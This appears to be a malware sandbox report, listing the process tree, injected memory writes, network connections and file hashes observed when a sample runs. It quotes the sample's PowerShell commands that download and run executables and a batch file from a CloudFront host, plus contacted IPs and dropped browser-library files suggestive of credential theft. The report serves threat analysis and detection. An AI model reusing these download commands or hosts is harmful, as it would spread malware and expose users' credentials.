PID 604 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.3.exe
PID 604 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.3.exe
PID 604 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.3.exe
PID 604 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.3.exe
PID 1544 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\ugs.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1608 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\ugs.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1608 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\ugs.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1608 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\ugs.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe

"C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsi6C5.tmp\load.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\ugs.0.exe

"C:\Users\Admin\AppData\Local\Temp\ugs.0.exe"

C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=1667','i3.exe')"

C:\Users\Admin\AppData\Local\Temp\ugs.3.exe

"C:\Users\Admin\AppData\Local\Temp\ugs.3.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
IT 108.156.0.203:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
US 8.8.8.8:53 240216234727901.mjj.xne26.cfd udp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 note.padd.cn.com udp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.62:80 185.172.128.62 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.51:80 download.iolo.net tcp
FR 143.244.56.51:443 download.iolo.net tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
RU 91.215.85.66:15647 tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp

Files

\Users\Admin\AppData\Local\Temp\nsi6C5.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar9F9.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0e21bca6840e5d0fab2459f8100e5ec8
SHA1 6d6744f6074f1ddfb12b2393c612eb840e226e12
SHA256 806b74106cc0904a36a8ecbeb96dcbf35098fcbb7637bc7d84872549bfb08423
SHA512 cfd6abf8455eb1bb56eda91b290845fd6af72f233f2a40188487ad0c39024e3491a8747f8112c571d140ae3bba2306ac78c5a21eda4c85d279f73b22aaad5435

C:\Users\Admin\AppData\Local\Temp\nsi6C5.tmp\load.bat

MD5 75599c4a0c50b789c306880785ffa782
SHA1 31bb898b645b5616b2adf0a4718a9f24ce28e1c1
SHA256 fe26f8ca5512caeff7dffd12c2ffc11115850db0764a3ef9f943fa9f349e0a77
SHA512 b9ea2629a7f212aab59cb7a8bfdb684b1f23086b488b2a28b25784ad629c42dd8e71b4ef4927728df436a53c2f94d66013a166a407bcbc5dd6570c3b03fb31ad

memory/1612-151-0x0000000002910000-0x0000000002950000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 12dada190827ebad40aa7e70e28a6f02
SHA1 172009e0cb78cb093bcccf5e69df83a7dba4605d
SHA256 182d486d4735037d6be3a083acedd0991cf9520d20faa6f4bce7470675952c42
SHA512 bd9daf51dd65553076b651224cab416dccddc7230212fa4d12423394d765dbb6f0355f3f0631c9c5359417347505085667f4682da91d89d3baeae82e67bcbc78

C:\Users\Admin\AppData\Local\Temp\i1.exe

MD5 fdd3895eb388f733e4aabd00db54e6f7
SHA1 604978bd31d87066735e13343f26f80ce7f45706
SHA256 303ba93e0bb762a95859f5c94016e7cda0ace2fba811fb78e86af98baa2f3d01
SHA512 6b891f36976ec4f5bd8590215f191c43e93f69c19a83f2eab44ef5b2d17fbecc5531a05c2137c97164f0917bf5a0d41cb245760eb1544d83fa212d4a1d806756

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\Users\Admin\AppData\Local\Temp\ugs.0.exe

MD5 f85ca7da4201921c93b98f6555f3d7b7
SHA1 523891e3e23bb45a52e402b6282f70f9e17cde9c
SHA256 eeaa177b0bc2d85cf8b416c2ed3b85fd50bd7c811bf41a32d161a10a767c2fda
SHA512 1b8220fe954799fbc43a702a1c508beff390c3f5a58e8e50e3c5ccce48459ec3a25df395f041f722cb67b0eb6c31013239f58a8b947e60344d15ce0c56e9cb17

C:\Users\Admin\AppData\Local\Temp\UGS1~1.ZIP

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

C:\Users\Admin\AppData\Local\Temp\ugs.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

memory/408-282-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ugs.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\ugs.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/1544-303-0x0000000073D10000-0x0000000073E84000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ugs.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

memory/1544-311-0x00000000778A0000-0x0000000077A49000-memory.dmp

\Users\Admin\AppData\Local\Temp\ugs.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/604-377-0x0000000000400000-0x0000000001A3C000-memory.dmp

memory/1544-401-0x0000000073D10000-0x0000000073E84000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cd0457d7

MD5 a03f27154b557f18e8c42b73077d6dfd
SHA1 b3056140416c384dcc915467c00bb70e9e70f125
SHA256 51465b98eb2483ce4507d906a880193acb0abb69626e31af0d624cc286e403e7
SHA512 06a21bac33bc9462a846cf7a9d7dd41ad5123c8c2cc7fc3bc35f7d2ace8e275c63bcbf870ba1765c0c62e90455609829827967005af7f756b1425da7e4c2ae0a

memory/408-410-0x0000000000400000-0x000000000083A000-memory.dmp

memory/2672-413-0x00000000778A0000-0x0000000077A49000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 4e15970a2356c3311fff5a25b3612600
SHA1 72bea07e88c2a88de774d1e3692aa81a1c9ec16b
SHA256 54af852620c9b26c6644fb3732e1f62d02765d052f534444ad310f0db81d5da7
SHA512 5e8ea87584fe7c01636489d50448e7471ba19b9bd1149cf2a3bcc626a5ad195f342bacf33a87c5f3df7657fd8ee4f53cf02b7809c4afe8c566dcac3cd56a07ab

memory/1608-469-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1112-475-0x0000000000AD0000-0x00000000043C8000-memory.dmp

memory/1112-476-0x000000001ED90000-0x000000001EEA0000-memory.dmp

memory/1112-478-0x0000000000AC0000-0x0000000000ACC000-memory.dmp

memory/1112-477-0x00000000004F0000-0x0000000000500000-memory.dmp

memory/1112-479-0x0000000000560000-0x0000000000574000-memory.dmp

memory/1112-480-0x00000000059A0000-0x00000000059C4000-memory.dmp

memory/1112-484-0x000000001F7C0000-0x000000001F872000-memory.dmp

memory/1112-483-0x000000001EC30000-0x000000001EC5A000-memory.dmp

memory/1112-482-0x0000000005AD0000-0x0000000005ADA000-memory.dmp

memory/1112-485-0x000000001F870000-0x000000001F8EA000-memory.dmp

memory/1112-486-0x000000001E4B0000-0x000000001E512000-memory.dmp

memory/1112-487-0x0000000000510000-0x000000000051A000-memory.dmp

memory/1112-491-0x000000001FE40000-0x0000000020140000-memory.dmp

memory/1112-493-0x0000000000AB0000-0x0000000000ABA000-memory.dmp

memory/1112-494-0x00000000058E0000-0x0000000005902000-memory.dmp

memory/1112-497-0x0000000005900000-0x000000000590C000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/408-526-0x0000000000400000-0x000000000083A000-memory.dmp

memory/1112-527-0x0000000000530000-0x000000000053A000-memory.dmp

memory/2672-528-0x0000000073D10000-0x0000000073E84000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\bd92d7984d802ff9a1e24336bd1ccb4209c69a1bd116225cd9479ac9d0f516c4\84af76652e58465384fe5df010aef13c.tmp

MD5 03095887d4de39c186e03489d4afb9ef
SHA1 ce40c68344ea2ba092e27787178a899dc8a05763
SHA256 3f23d563d18318f2448a804bcc50694b8e48b228d9ed05d9bb3a176409bc60f0
SHA512 24b80c7c977d0cf6852a1ea1177bac2972597b884d76f866d6e200c4c2ef30bc51d587f8749134cfe13b573dfd9489a0997d93b1a3c054ef7b93444b7e717743

memory/2728-536-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2728-537-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2728-535-0x0000000072CA0000-0x0000000073D02000-memory.dmp

memory/408-540-0x0000000000400000-0x000000000083A000-memory.dmp

memory/2728-541-0x0000000000400000-0x00000000004C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpBDC4.tmp

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73